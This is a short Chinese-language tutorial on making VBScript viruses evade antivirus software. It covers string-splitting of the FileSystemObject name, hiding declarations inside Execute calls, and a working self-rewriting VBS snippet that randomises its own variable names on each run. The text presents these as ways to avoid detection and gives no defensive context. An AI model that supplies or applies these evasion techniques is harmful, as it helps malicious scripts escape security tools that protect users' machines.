1、改變對象的聲明方式
譬如fso=createobject("scripting.filesystemobject"),我們將其改變為
fso=createobject("script"+"ing.filesyste"+"mobject"),這樣反病毒軟件對其進行靜態掃描時就不會發現filesystemobject對象。
2、利用Execute函數
巧妙運用Execute方法可以有效防治殺毒軟件查殺。很多殺毒軟件檢測VBS病毒時,會檢查程序中是否聲明使用了FileSystemObject對象,如果采用了,這會發出報警。如果病毒將這段聲明代碼轉化為字符串,然后通過Execute(String)函數執行,就可以躲避某些
反病毒軟件。
3、代碼動態變化
下面引用一個網上代碼變化引擎的例子說明
Randomize
Set Of = CreateObject("Scripting.FileSystemObject")
’創建文件系統對象
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
’讀取自身代碼
fS=Array("Of", "vC", "fS", "fSC")
’定義一個即將被替換字符的數組
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))
& Chr((Int(Rnd * 22) + 65)))
’取4個隨機字符替換數組fS中的字符串
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC
’將替換后的代碼寫回文件
以上就是VBS腳本躲避殺軟的主要手段